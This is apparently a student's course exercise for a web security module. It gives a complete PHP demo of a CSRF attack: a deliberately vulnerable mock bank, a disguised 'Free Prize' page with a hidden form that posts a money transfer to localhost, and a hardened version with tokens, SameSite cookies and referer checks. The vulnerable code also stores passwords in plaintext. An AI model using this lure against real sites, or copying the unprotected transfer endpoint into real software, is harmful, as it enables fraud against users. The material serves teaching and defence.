================================================================================
                   EXERCISE 4.2: CSRF ATTACK - COMPLETE CODE
                   Siddesh Vilas Pawar | MSc Cyber Security
                        University of Surrey | COMM047
================================================================================

This file contains ALL code files needed for the CSRF demonstration.
Copy each section into the respective file as indicated.

DIRECTORY STRUCTURE:
csrf_demo/
├── README.md (see Exercise4_Web_Security.html)
├── vulnerable/ (6 files below)
├── attacker/ (1 file below)
└── secure/ (6 files below)

================================================================================
 VULNERABLE VERSION - Files 1-6
================================================================================

--------------------------------------------------------------------------------
FILE 1: vulnerable/init_db.php
--------------------------------------------------------------------------------
<?php
// Database initialization for vulnerable banking site

try {
    $db = new PDO('sqlite:bank_vulnerable.db');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    
    // Create users table
    $db->exec("
        CREATE TABLE IF NOT EXISTS users (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            username TEXT UNIQUE NOT NULL,
            password TEXT NOT NULL,
            balance REAL NOT NULL DEFAULT 0
        )
    ");
    
    // Create transactions table
    $db->exec("
        CREATE TABLE IF NOT EXISTS transactions (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            sender TEXT NOT NULL,
            recipient TEXT NOT NULL,
            amount REAL NOT NULL,
            timestamp DATETIME DEFAULT CURRENT_TIMESTAMP
        )
    ");
    
    // Clear existing data
    $db->exec("DELETE FROM users");
    $db->exec("DELETE FROM transactions");
    
    // Insert test users (plaintext passwords for demo only!)
    $users = [
        ['alice', 'alice123', 5000],
        ['bob', 'bob123', 3000],
        ['eve', 'eve123', 1000]
    ];
    
    $stmt = $db->prepare("INSERT INTO users (username, password, balance) VALUES (?, ?, ?)");
    foreach ($users as $user) {
        $stmt->execute($user);
    }
    
    echo "✓ Database initialized successfully!\n";
    echo "Test users created:\n";
    echo "  alice/alice123 - \$5,000\n";
    echo "  bob/bob123     - \$3,000\n";
    echo "  eve/eve123     - \$1,000\n";
    
} catch (PDOException $e) {
    die("✗ Database error: " . $e->getMessage());
}
?>

--------------------------------------------------------------------------------
FILE 2: vulnerable/index.php
--------------------------------------------------------------------------------
<?php
session_start();

// Redirect if already logged in
if (isset($_SESSION['user'])) {
    header('Location: dashboard.php');
    exit;
}

$error = '';

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $username = $_POST['username'] ?? '';
    $password = $_POST['password'] ?? '';
    
    try {
        $db = new PDO('sqlite:bank_vulnerable.db');
        $stmt = $db->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
        $stmt->execute([$username, $password]);
        $user = $stmt->fetch(PDO::FETCH_ASSOC);
        
        if ($user) {
            $_SESSION['user'] = $username;
            header('Location: dashboard.php');
            exit;
        } else {
            $error = 'Invalid credentials';
        }
    } catch (PDOException $e) {
        $error = 'Database error';
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Vulnerable Bank - Login</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h1>🏦 Vulnerable Bank Login</h1>
        <div class="warning">⚠️ NO CSRF PROTECTION</div>
        
        <?php if ($error): ?>
            <div class="error"><?= htmlspecialchars($error) ?></div>
        <?php endif; ?>
        
        <form method="POST">
            <label>Username:</label>
            <input type="text" name="username" required autofocus>
            
            <label>Password:</label>
            <input type="password" name="password" required>
            
            <button type="submit">Login</button>
        </form>
        
        <p class="hint">Test users: alice/alice123, bob/bob123, eve/eve123</p>
    </div>
</body>
</html>

--------------------------------------------------------------------------------
FILE 3: vulnerable/dashboard.php
--------------------------------------------------------------------------------
<?php
session_start();

if (!isset($_SESSION['user'])) {
    header('Location: index.php');
    exit;
}

$username = $_SESSION['user'];

try {
    $db = new PDO('sqlite:bank_vulnerable.db');
    
    // Get current balance
    $stmt = $db->prepare("SELECT balance FROM users WHERE username = ?");
    $stmt->execute([$username]);
    $balance = $stmt->fetchColumn();
    
    // Get recent transactions
    $stmt = $db->prepare("
        SELECT * FROM transactions 
        WHERE sender = ? OR recipient = ? 
        ORDER BY timestamp DESC LIMIT 10
    ");
    $stmt->execute([$username, $username]);
    $transactions = $stmt->fetchAll(PDO::FETCH_ASSOC);
    
} catch (PDOException $e) {
    die('Database error');
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Dashboard - Vulnerable Bank</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h1>🏦 Welcome, <?= htmlspecialchars($username) ?></h1>
        <div class="balance">Current Balance: $<?= number_format($balance, 2) ?></div>
        
        <div class="warning">⚠️ VULNERABLE: No CSRF protection on transfer form!</div>
        
        <h2>Transfer Money</h2>
        <form method="POST" action="transfer.php">
            <label>Recipient:</label>
            <select name="recipient" required>
                <option value="">Select recipient</option>
                <?php
                $stmt = $db->prepare("SELECT username FROM users WHERE username != ?");
                $stmt->execute([$username]);
                while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
                    echo "<option value='{$row['username']}'>{$row['username']}</option>";
                }
                ?>
            </select>
            
            <label>Amount:</label>
            <input type="number" name="amount" min="1" step="0.01" required>
            
            <button type="submit">Transfer</button>
        </form>
        
        <h2>Recent Transactions</h2>
        <table>
            <tr><th>From</th><th>To</th><th>Amount</th><th>Time</th></tr>
            <?php foreach ($transactions as $tx): ?>
                <tr>
                    <td><?= htmlspecialchars($tx['sender']) ?></td>
                    <td><?= htmlspecialchars($tx['recipient']) ?></td>
                    <td>$<?= number_format($tx['amount'], 2) ?></td>
                    <td><?= $tx['timestamp'] ?></td>
                </tr>
            <?php endforeach; ?>
        </table>
        
        <a href="logout.php" class="logout">Logout</a>
    </div>
</body>
</html>

--------------------------------------------------------------------------------
FILE 4: vulnerable/transfer.php (⚠️ VULNERABLE!)
--------------------------------------------------------------------------------
<?php
session_start();

if (!isset($_SESSION['user'])) {
    die('Not logged in');
}

// ⚠️ VULNERABLE: NO CSRF TOKEN VALIDATION!
// This endpoint accepts ANY POST request with valid session

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $sender = $_SESSION['user'];
    $recipient = $_POST['recipient'] ?? '';
    $amount = floatval($_POST['amount'] ?? 0);
    
    if (empty($recipient) || $amount <= 0) {
        die('Invalid transfer parameters');
    }
    
    try {
        $db = new PDO('sqlite:bank_vulnerable.db');
        $db->beginTransaction();
        
        // Check sender balance
        $stmt = $db->prepare("SELECT balance FROM users WHERE username = ?");
        $stmt->execute([$sender]);
        $sender_balance = $stmt->fetchColumn();
        
        if ($sender_balance < $amount) {
            die('Insufficient funds');
        }
        
        // Deduct from sender
        $stmt = $db->prepare("UPDATE users SET balance = balance - ? WHERE username = ?");
        $stmt->execute([$amount, $sender]);
        
        // Add to recipient
        $stmt = $db->prepare("UPDATE users SET balance = balance + ? WHERE username = ?");
        $stmt->execute([$amount, $recipient]);
        
        // Log transaction
        $stmt = $db->prepare("
            INSERT INTO transactions (sender, recipient, amount) VALUES (?, ?, ?)
        ");
        $stmt->execute([$sender, $recipient, $amount]);
        
        $db->commit();
        
        // Success - redirect back
        header('Location: dashboard.php');
        exit;
        
    } catch (PDOException $e) {
        $db->rollBack();
        die('Transfer failed: ' . $e->getMessage());
    }
}
?>

--------------------------------------------------------------------------------
FILE 5: vulnerable/logout.php
--------------------------------------------------------------------------------
<?php
session_start();
session_destroy();
header('Location: index.php');
exit;
?>

--------------------------------------------------------------------------------
FILE 6: vulnerable/styles.css
--------------------------------------------------------------------------------
body {
    font-family: Arial, sans-serif;
    background: #f0f2f5;
    padding: 20px;
}

.container {
    max-width: 600px;
    margin: 0 auto;
    background: white;
    padding: 30px;
    border-radius: 10px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}

h1 { color: #333; text-align: center; margin-bottom: 20px; }
h2 { color: #555; border-bottom: 2px solid #ddd; padding-bottom: 10px; margin-top: 30px; }

.balance {
    background: #4CAF50;
    color: white;
    padding: 20px;
    text-align: center;
    font-size: 24px;
    border-radius: 8px;
    margin: 20px 0;
}

.warning {
    background: #ff5722;
    color: white;
    padding: 15px;
    text-align: center;
    border-radius: 5px;
    margin: 20px 0;
    font-weight: bold;
}

.success {
    background: #4CAF50;
    color: white;
    padding: 15px;
    text-align: center;
    border-radius: 5px;
    margin: 20px 0;
    font-weight: bold;
}

.error {
    background: #f44336;
    color: white;
    padding: 10px;
    border-radius: 5px;
    margin: 10px 0;
}

form {
    margin: 20px 0;
}

label {
    display: block;
    margin: 10px 0 5px;
    font-weight: bold;
}

input, select {
    width: 100%;
    padding: 10px;
    border: 1px solid #ddd;
    border-radius: 5px;
    box-sizing: border-box;
}

button {
    width: 100%;
    padding: 12px;
    background: #2196F3;
    color: white;
    border: none;
    border-radius: 5px;
    font-size: 16px;
    cursor: pointer;
    margin-top: 10px;
}

button:hover { background: #0b7dda; }

table {
    width: 100%;
    border-collapse: collapse;
    margin-top: 20px;
}

table th {
    background: #2196F3;
    color: white;
    padding: 10px;
    text-align: left;
}

table td {
    padding: 10px;
    border-bottom: 1px solid #ddd;
}

table tr:hover { background: #f5f5f5; }

.hint { text-align: center; color: #666; font-size: 14px; margin-top: 10px; }

.logout {
    display: inline-block;
    margin-top: 20px;
    padding: 10px 20px;
    background: #f44336;
    color: white;
    text-decoration: none;
    border-radius: 5px;
}

.logout:hover { background: #da190b; }

================================================================================
 ATTACKER VERSION - File 7
================================================================================

--------------------------------------------------------------------------------
FILE 7: attacker/malicious.html (CSRF EXPLOIT - WITH DROPDOWN SELECTOR)
--------------------------------------------------------------------------------
<!DOCTYPE html>
<html>
<head>
    <title>Free Prize!</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            padding: 50px;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: white;
            min-height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        .prize-box {
            background: white;
            color: #333;
            padding: 40px;
            border-radius: 20px;
            max-width: 600px;
            box-shadow: 0 10px 40px rgba(0,0,0,0.3);
        }
        h1 { 
            color: #667eea; 
            font-size: 48px; 
            margin-bottom: 20px;
            animation: bounce 2s infinite;
        }
        @keyframes bounce {
            0%, 100% { transform: translateY(0); }
            50% { transform: translateY(-10px); }
        }
        p {
            font-size: 18px;
            line-height: 1.6;
            margin: 20px 0;
        }
        .target-selector {
            background: #f5f5f5;
            padding: 20px;
            border-radius: 10px;
            margin: 20px 0;
            border: 2px solid #ddd;
        }
        .target-selector label {
            display: block;
            font-weight: bold;
            margin-bottom: 10px;
            color: #333;
            font-size: 16px;
        }
        .target-selector select {
            width: 100%;
            padding: 12px;
            font-size: 16px;
            border: 2px solid #667eea;
            border-radius: 8px;
            background: white;
            cursor: pointer;
            color: #333;
        }
        .target-selector select:focus {
            outline: none;
            border-color: #764ba2;
            box-shadow: 0 0 10px rgba(102,126,234,0.3);
        }
        .target-info {
            margin-top: 15px;
            padding: 12px;
            border-radius: 8px;
            font-size: 14px;
            font-weight: bold;
        }
        .target-vulnerable {
            background: #ffebee;
            color: #c62828;
            border: 2px solid #ef5350;
        }
        .target-secure {
            background: #e8f5e9;
            color: #2e7d32;
            border: 2px solid #66bb6a;
        }
        button {
            background: #667eea;
            color: white;
            border: none;
            padding: 20px 50px;
            font-size: 24px;
            border-radius: 50px;
            cursor: pointer;
            transition: all 0.3s;
            box-shadow: 0 5px 15px rgba(102,126,234,0.4);
            margin-top: 20px;
        }
        button:hover {
            background: #764ba2;
            transform: scale(1.05);
            box-shadow: 0 8px 25px rgba(118,75,162,0.6);
        }
        .hidden { display: none; }
        .disclaimer {
            margin-top: 30px;
            font-size: 12px;
            color: #999;
        }
        .instructions {
            background: #fff3cd;
            color: #856404;
            padding: 15px;
            border-radius: 8px;
            margin-bottom: 20px;
            font-size: 14px;
            border: 2px solid #ffc107;
        }
    </style>
</head>
<body>
    <div class="prize-box">
        <h1>Congratulations!</h1>
        <p style="font-size: 22px; font-weight: bold; color: #667eea;">
            You've Been Selected!
        </p>
        <p>
            You have won a <strong>$1,000 cash prize</strong> from our 
            exclusive promotion!
        </p>
        
        <!-- TESTING INSTRUCTIONS FOR EXAMINER -->
        <div class="instructions">
            <strong>[For Examiner]:</strong> Select target bank below, login to that bank in another tab, then click the prize button.
        </div>
        
        <!-- TARGET SELECTION DROPDOWN -->
        <div class="target-selector">
            <label for="target-select">[Select Attack Target]</label>
            <select id="target-select" onchange="updateTarget()">
                <option value="8000">Port 8000 - Vulnerable Bank (NO CSRF Protection)</option>
                <option value="8001">Port 8001 - Secure Bank (WITH CSRF Protection)</option>
            </select>
            <div id="target-info" class="target-info target-vulnerable">
                [WARNING] Attacking VULNERABLE bank - Attack should SUCCEED
            </div>
        </div>
        
        <p>
            Click the button below to claim your reward now:
        </p>
        <button onclick="claimPrize()">Claim Your Prize!</button>
        
        <!-- HIDDEN CSRF ATTACK FORM (dynamically updated by JavaScript) -->
        <form id="csrf-attack" class="hidden" method="POST" 
              action="http://localhost:8000/transfer.php">
            <input type="hidden" name="recipient" value="eve">
            <input type="hidden" name="amount" value="1000">
        </form>
        
        <p class="disclaimer">
            *This is an educational demonstration for Exercise 4.2<br>
            <strong>Current Target:</strong> <span id="current-target">localhost:8000 (Vulnerable)</span>
        </p>
    </div>
    
    <script>
        // Update target based on dropdown selection
        function updateTarget() {
            const select = document.getElementById('target-select');
            const port = select.value;
            const form = document.getElementById('csrf-attack');
            const infoDiv = document.getElementById('target-info');
            const currentTarget = document.getElementById('current-target');
            
            // Update form action dynamically
            form.action = `http://localhost:${port}/transfer.php`;
            
            // Update UI feedback
            if (port === '8000') {
                infoDiv.className = 'target-info target-vulnerable';
                infoDiv.innerHTML = '[WARNING] Attacking VULNERABLE bank - Attack should SUCCEED';
                currentTarget.textContent = 'localhost:8000 (Vulnerable)';
            } else {
                infoDiv.className = 'target-info target-secure';
                infoDiv.innerHTML = '[PROTECTED] Attacking SECURE bank - Attack should be BLOCKED';
                currentTarget.textContent = 'localhost:8001 (Secure)';
            }
        }
        
        function claimPrize() {
            const port = document.getElementById('target-select').value;
            const bankType = port === '8000' ? 'VULNERABLE' : 'SECURE';
            
            alert(`Processing your prize...\n\nPlease wait while we verify your account.\n\n[Hidden: Attacking ${bankType} bank on port ${port}]`);
            
            // CSRF ATTACK MECHANISM:
            // Form submits to selected port (8000 or 8001)
            // Browser automatically includes victim's session cookie for that port
            // Port 8000: NO CSRF validation → Attack succeeds
            // Port 8001: CSRF token validation → Attack blocked
            
            document.getElementById('csrf-attack').submit();
        }
    </script>
</body>
</html>

================================================================================
 SECURE VERSION - Files 8-13 (WITH CSRF PROTECTION)
================================================================================

--------------------------------------------------------------------------------
FILE 8: secure/init_db.php
--------------------------------------------------------------------------------
<?php
// Database initialization for SECURE banking site
// (Same as vulnerable but different database name)

try {
    $db = new PDO('sqlite:bank_secure.db');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    
    $db->exec("
        CREATE TABLE IF NOT EXISTS users (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            username TEXT UNIQUE NOT NULL,
            password TEXT NOT NULL,
            balance REAL NOT NULL DEFAULT 0
        )
    ");
    
    $db->exec("
        CREATE TABLE IF NOT EXISTS transactions (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            sender TEXT NOT NULL,
            recipient TEXT NOT NULL,
            amount REAL NOT NULL,
            timestamp DATETIME DEFAULT CURRENT_TIMESTAMP
        )
    ");
    
    $db->exec("DELETE FROM users");
    $db->exec("DELETE FROM transactions");
    
    $users = [
        ['alice', 'alice123', 5000],
        ['bob', 'bob123', 3000],
        ['eve', 'eve123', 1000]
    ];
    
    $stmt = $db->prepare("INSERT INTO users (username, password, balance) VALUES (?, ?, ?)");
    foreach ($users as $user) {
        $stmt->execute($user);
    }
    
    echo "✓ Secure database initialized successfully!\n";
    echo "Test users created:\n";
    echo "  alice/alice123 - \$5,000\n";
    echo "  bob/bob123     - \$3,000\n";
    echo "  eve/eve123     - \$1,000\n";
    
} catch (PDOException $e) {
    die("✗ Database error: " . $e->getMessage());
}
?>

--------------------------------------------------------------------------------
FILE 9: secure/index.php
--------------------------------------------------------------------------------
<?php
session_start();

// ✅ COUNTERMEASURE 1: SameSite Cookie Attribute
session_set_cookie_params([
    'lifetime' => 3600,
    'path' => '/',
    'domain' => 'localhost',
    'secure' => false,     // Set true in production with HTTPS
    'httponly' => true,    // Prevent JavaScript access
    'samesite' => 'Lax'    // Block cross-site cookie transmission
]);

if (isset($_SESSION['user'])) {
    header('Location: dashboard.php');
    exit;
}

$error = '';

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $username = $_POST['username'] ?? '';
    $password = $_POST['password'] ?? '';
    
    try {
        $db = new PDO('sqlite:bank_secure.db');
        $stmt = $db->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
        $stmt->execute([$username, $password]);
        $user = $stmt->fetch(PDO::FETCH_ASSOC);
        
        if ($user) {
            $_SESSION['user'] = $username;
            // ✅ COUNTERMEASURE 2: Generate CSRF token on login
            $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
            header('Location: dashboard.php');
            exit;
        } else {
            $error = 'Invalid credentials';
        }
    } catch (PDOException $e) {
        $error = 'Database error';
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Secure Bank - Login</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h1>🔒 Secure Bank Login</h1>
        <div class="success">✅ CSRF PROTECTION ENABLED</div>
        
        <?php if ($error): ?>
            <div class="error"><?= htmlspecialchars($error) ?></div>
        <?php endif; ?>
        
        <form method="POST">
            <label>Username:</label>
            <input type="text" name="username" required autofocus>
            
            <label>Password:</label>
            <input type="password" name="password" required>
            
            <button type="submit">Login</button>
        </form>
        
        <p class="hint">Test users: alice/alice123, bob/bob123, eve/eve123</p>
    </div>
</body>
</html>

--------------------------------------------------------------------------------
FILE 10: secure/dashboard.php
--------------------------------------------------------------------------------
<?php
session_start();

if (!isset($_SESSION['user'])) {
    header('Location: index.php');
    exit;
}

// ✅ COUNTERMEASURE 3: Generate CSRF token if not exists
if (!isset($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

$username = $_SESSION['user'];

try {
    $db = new PDO('sqlite:bank_secure.db');
    
    $stmt = $db->prepare("SELECT balance FROM users WHERE username = ?");
    $stmt->execute([$username]);
    $balance = $stmt->fetchColumn();
    
    $stmt = $db->prepare("
        SELECT * FROM transactions 
        WHERE sender = ? OR recipient = ? 
        ORDER BY timestamp DESC LIMIT 10
    ");
    $stmt->execute([$username, $username]);
    $transactions = $stmt->fetchAll(PDO::FETCH_ASSOC);
    
} catch (PDOException $e) {
    die('Database error');
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Dashboard - Secure Bank</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h1>🔒 Welcome, <?= htmlspecialchars($username) ?></h1>
        <div class="balance">Current Balance: $<?= number_format($balance, 2) ?></div>
        
        <div class="success">✅ PROTECTED: CSRF tokens enabled!</div>
        
        <h2>Transfer Money</h2>
        <form method="POST" action="transfer.php">
            <!-- ✅ CSRF Token Hidden Field -->
            <input type="hidden" name="csrf_token" value="<?= $_SESSION['csrf_token'] ?>">
            
            <label>Recipient:</label>
            <select name="recipient" required>
                <option value="">Select recipient</option>
                <?php
                $stmt = $db->prepare("SELECT username FROM users WHERE username != ?");
                $stmt->execute([$username]);
                while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
                    echo "<option value='{$row['username']}'>{$row['username']}</option>";
                }
                ?>
            </select>
            
            <label>Amount:</label>
            <input type="number" name="amount" min="1" step="0.01" required>
            
            <button type="submit">Transfer</button>
        </form>
        
        <h2>Recent Transactions</h2>
        <table>
            <tr><th>From</th><th>To</th><th>Amount</th><th>Time</th></tr>
            <?php foreach ($transactions as $tx): ?>
                <tr>
                    <td><?= htmlspecialchars($tx['sender']) ?></td>
                    <td><?= htmlspecialchars($tx['recipient']) ?></td>
                    <td>$<?= number_format($tx['amount'], 2) ?></td>
                    <td><?= $tx['timestamp'] ?></td>
                </tr>
            <?php endforeach; ?>
        </table>
        
        <a href="logout.php" class="logout">Logout</a>
    </div>
</body>
</html>

--------------------------------------------------------------------------------
FILE 11: secure/transfer.php (✅ PROTECTED!)
--------------------------------------------------------------------------------
<?php
session_start();

if (!isset($_SESSION['user'])) {
    die('Not logged in');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // ✅ COUNTERMEASURE 4: CSRF Token Validation
    if (!isset($_POST['csrf_token']) || $_POST['csrf_token'] !== $_SESSION['csrf_token']) {
        die('⛔ CSRF token validation failed! Attack blocked.');
    }
    
    // ✅ COUNTERMEASURE 5: Referer Header Validation (fallback)
    $referer = $_SERVER['HTTP_REFERER'] ?? '';
    if (strpos($referer, 'http://localhost:8001') !== 0) {
        die('⛔ Invalid referer! Request must originate from same domain.');
    }
    
    $sender = $_SESSION['user'];
    $recipient = $_POST['recipient'] ?? '';
    $amount = floatval($_POST['amount'] ?? 0);
    
    if (empty($recipient) || $amount <= 0) {
        die('Invalid transfer parameters');
    }
    
    try {
        $db = new PDO('sqlite:bank_secure.db');
        $db->beginTransaction();
        
        $stmt = $db->prepare("SELECT balance FROM users WHERE username = ?");
        $stmt->execute([$sender]);
        $sender_balance = $stmt->fetchColumn();
        
        if ($sender_balance < $amount) {
            die('Insufficient funds');
        }
        
        $stmt = $db->prepare("UPDATE users SET balance = balance - ? WHERE username = ?");
        $stmt->execute([$amount, $sender]);
        
        $stmt = $db->prepare("UPDATE users SET balance = balance + ? WHERE username = ?");
        $stmt->execute([$amount, $recipient]);
        
        $stmt = $db->prepare("INSERT INTO transactions (sender, recipient, amount) VALUES (?, ?, ?)");
        $stmt->execute([$sender, $recipient, $amount]);
        
        $db->commit();
        
        // ✅ COUNTERMEASURE 6: Regenerate CSRF token after use
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
        
        header('Location: dashboard.php');
        exit;
        
    } catch (PDOException $e) {
        $db->rollBack();
        die('Transfer failed: ' . $e->getMessage());
    }
}
?>

--------------------------------------------------------------------------------
FILE 12: secure/logout.php
--------------------------------------------------------------------------------
<?php
session_start();
session_destroy();
header('Location: index.php');
exit;
?>

--------------------------------------------------------------------------------
FILE 13: secure/styles.css (Same as vulnerable/styles.css)
--------------------------------------------------------------------------------
(Copy content from vulnerable/styles.css above)

================================================================================
 COUNTERMEASURES SUMMARY (Question 4.2b - 5 Marks)
================================================================================

COUNTERMEASURE 1: Synchronizer Token Pattern (CSRF Tokens)
-----------------------------------------------------------
Implementation:
- Generate unique random token on login: bin2hex(random_bytes(32))
- Store in $_SESSION['csrf_token']
- Embed in forms as hidden field
- Validate on submission: $_POST['csrf_token'] === $_SESSION['csrf_token']
- Regenerate after successful use

Effectiveness: ⭐⭐⭐⭐⭐ (Primary defense)
Location: secure/index.php (line 28), dashboard.php (line 64), transfer.php (line 12)

COUNTERMEASURE 2: SameSite Cookie Attribute
--------------------------------------------
Implementation:
session_set_cookie_params([
    'samesite' => 'Lax'  // Blocks cross-site cookie transmission
]);

Effectiveness: ⭐⭐⭐⭐⭐ (Modern browser defense)
Location: secure/index.php (line 4-10)
How it works: Browser refuses to send cookie with cross-site POST requests

COUNTERMEASURE 3: Referer Header Validation
--------------------------------------------
Implementation:
$referer = $_SERVER['HTTP_REFERER'] ?? '';
if (strpos($referer, 'http://localhost:8001') !== 0) {
    die('Invalid referer!');
}

Effectiveness: ⭐⭐⭐ (Fallback - can be stripped by proxies)
Location: secure/transfer.php (line 17-20)

COUNTERMEASURE 4: Token Regeneration
-------------------------------------
Implementation:
$_SESSION['csrf_token'] = bin2hex(random_bytes(32));  // After each use

Effectiveness: ⭐⭐⭐⭐ (Prevents token reuse)
Location: secure/transfer.php (line 49)

ADDITIONAL SECURITY MEASURES:
-----------------------------
- HttpOnly flag: Prevents JavaScript access to session cookie
- Prepared statements: Prevents SQL injection
- Transaction rollback: Ensures data consistency
- Input validation: Checks recipient and amount

================================================================================
 END OF CODE
================================================================================

References:
- PHP CSRF Tutorial: https://www.phptutorial.net/php-tutorial/php-csrf/
- OWASP CSRF Prevention: https://owasp.org/www-community/attacks/csrf
- RFC 6265bis (SameSite): https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis